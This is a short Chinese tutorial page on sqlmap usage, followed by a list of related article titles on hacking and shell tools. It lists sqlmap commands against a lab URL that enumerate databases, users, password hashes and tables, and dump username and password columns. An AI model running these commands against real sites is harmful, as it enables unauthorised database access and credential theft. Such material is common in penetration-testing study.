sqlmap的简要使用方法
来源:互联网 发布:查看论文的软件 编辑:程序博客网 时间:2024/06/05 04:08
sqlmap使用:
注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点 检测注入点是否可用
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --dbs #可曝出该sqlserver中所有数据库名称
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db #web当前使用的数据库
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user #web数据库使用账户
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --users #列出sql所有用户
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords #数据库账户与密码
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --tables #输出所有的表
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables #-D 指定数据库名
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns #-T:指定要列出字段的表 --columns 列出了所有的列字段
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 -C "username,realname,password" --dump # -C :指定要暴的字段 --dump:将结果导出
- sqlmap的简要使用方法
- SQLMap--SQLMap使用方法
- SQLMAP使用方法
- sqlmap 使用方法
- Sqlmap使用方法
- 关于拼接SQL语句sqlMap的使用方法
- SQLMAP使用方法笔记
- Spring iBatis Sqlmap 以及 parameterClass 和 parameterMap 的使用方法
- 渗透测试工具之SQLMap的详细使用方法
- Java日期时间处理的简要使用方法
- Android中PagerSlidingTabStrip的简要使用方法
- 局域网测速软件 iperf 的简要使用方法
- ViewPagerIndicator简要使用方法
- Cocos2d-x的ClippingNode的最简要使用方法
- 迭代器的使用方法简要介绍(摘自C++Primer)
- require.js简要概述及require.js的使用方法
- 11种常见SQLMAP使用方法详解
- Sqlmap的POST注入
- yum安装mysql后root用户的临时密码
- linux下字典生成工具-crunch与rtgen
- Socket学习总结系列(二) -- CocoaAsyncSocke
- 【专题】二分图最大匹配(匈牙利算法)
- 【原创】无线破解Aircrack-ng套件详解--airmon-ng与airodump-ng
- sqlmap的简要使用方法
- hydra简单使用示例
- shell编程学习笔记之标准输入输出(read&echo)
- Protecting Zonk UVA
- shell编程学习笔记之特殊变量($0、$1、$2、 $?、 $# 、$@、 $*)
- shell编程学习笔记--整数自增
- shell编程学习笔记之正则表达式初识
- 第二天:html中块行级、margin和padding、盒模型、css选择器和样式
- 编写一个简单的进程池